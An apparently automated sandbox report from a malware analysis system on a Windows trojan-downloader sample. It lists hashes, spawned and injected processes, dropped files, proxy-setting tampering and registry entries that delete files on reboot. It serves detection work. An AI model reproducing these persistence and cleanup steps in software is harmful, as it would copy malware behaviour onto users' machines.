Trojan-Downloader.NSIS.Adload.bx (Kaspersky), Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 2a8f25cc1fb9b6a8a14ec60736204e6f
SHA1: a74b910fcf8ce654ff7c033db73829927da9ebb4
SHA256: 1962b2d744537ea4c47fd9558d603cff83277737549f96c7ecc3b9c947a6b08e
SSDeep: 49152:vkojVzPgTpZLN8lT0RwkducdYETwAUC6asxS1HDJ:vkrZLmKRwtcdYETwfC6aYSP
Size: 2660132 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: Windows7 SP1 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
Setup__2140_il2.exe:3044
sevensetup.exe:2608
583afdedde2bb_ua.exe:1576
cpSetup.exe:2892
G5wycqyxwV.exe:3900
The Trojan injects its code into the following process(es):
Setup__2140_il2.exe:896
setup.exe:1104
%original file name%.exe:3584
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process Setup__2140_il2.exe:3044 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\index[1].htm (9382 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\index[1].htm (0 bytes)
The process Setup__2140_il2.exe:896 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (7399 bytes)
The process sevensetup.exe:2608 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\inetc.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8PAU9PHE.txt (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PXLM8U2Q.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe (253391 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss94B0.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\inetc.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe (0 bytes)
The process cpSetup.exe:2892 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\normal_bg[1].jpg (1633 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z6N4XLNR\appImg[1].jpg (4 bytes)
The process setup.exe:1104 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\spc_player.dll (64 bytes)
The process G5wycqyxwV.exe:3900 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\nsArray.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe (52926 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4673.tmp (1568 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\cpSetup.exe (58228 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\1104817113 (871 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\sevensetup.exe (4705 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\NSISdl.dll (31 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4662.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\nsArray.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\1104817113 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\sevensetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\cpSetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\NSISdl.dll (0 bytes)
The process %original file name%.exe:3584 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\ItNP6AjIFY (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\G5wycqyxwV.exe (5293 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\583afdd9a9098[1].exe (3920 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\launch_reb[1].htm (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\B (38534 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn28B5.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp (0 bytes)
Registry activity
The process Setup__2140_il2.exe:3044 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\vinyls.tramell]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\TypeLib]
"(Default)" = "{a0e998a2-81f0-420b-a12b-563442cf5349}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0]
"(Default)" = "InstallerLib"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1479738615"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\ProgID]
"(Default)" = "vinyls.tramell.1"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\VersionIndependentProgID]
"(Default)" = "vinyls.tramell"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"Version" = "1.0"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"
[HKCR\vinyls.tramell.1\CLSID]
"(Default)" = "{dded0858-104b-4eec-a82e-a44b49d78594}"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"(Default)" = "{A0E998A2-81F0-420B-A12B-563442CF5349}"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}]
"(Default)" = "IBoot"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}]
"(Default)" = "Inst Class"
[HKCR\vinyls.tramell.1]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3A 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Version]
"(Default)" = "1.0"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "50 6C 24 3E C4 48 D2 01"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCR\vinyls.tramell\CurVer]
"(Default)" = "vinyls.tramell.1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following registry key(s):
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid]
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}]
[HKCR\vinyls.tramell.1]
[HKCR\vinyls.tramell\CurVer]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\FLAGS]
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid32]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\ProgID]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Version]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0\win32]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Programmable]
[HKCR\vinyls.tramell.1\CLSID]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\TypeLib]
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
[HKCR\vinyls.tramell]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\HELPDIR]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\VersionIndependentProgID]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"ServerExecutable"
The process Setup__2140_il2.exe:896 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\vinyls.tramell]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\TypeLib]
"(Default)" = "{a0e998a2-81f0-420b-a12b-563442cf5349}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0]
"(Default)" = "InstallerLib"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1479738615"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\ProgID]
"(Default)" = "vinyls.tramell.1"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\VersionIndependentProgID]
"(Default)" = "vinyls.tramell"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"Version" = "1.0"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"
[HKCR\vinyls.tramell.1\CLSID]
"(Default)" = "{dded0858-104b-4eec-a82e-a44b49d78594}"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"(Default)" = "{A0E998A2-81F0-420B-A12B-563442CF5349}"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}]
"(Default)" = "IBoot"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}]
"(Default)" = "Inst Class"
[HKCR\vinyls.tramell.1]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Version]
"(Default)" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "50 6C 24 3E C4 48 D2 01"
[HKCR\vinyls.tramell\CurVer]
"(Default)" = "vinyls.tramell.1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process sevensetup.exe:2608 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "50 6C 24 3E C4 48 D2 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe,"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process 583afdedde2bb_ua.exe:1576 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
"WindowClassName" = "DDEMLMom"
The process cpSetup.exe:2892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1480239567"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "cpSetup.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "50 6C 24 3E C4 48 D2 01"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 37 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process G5wycqyxwV.exe:3900 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe,"
The process %original file name%.exe:3584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecision" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{24C5EDBC-2851-452A-B521-5DA992F6C1B5}"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionTime" = "10 CC 7D 3D C4 48 D2 01"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "3"
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 36 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadNetworkName" = "Network 2"
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "10 CC 7D 3D C4 48 D2 01"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
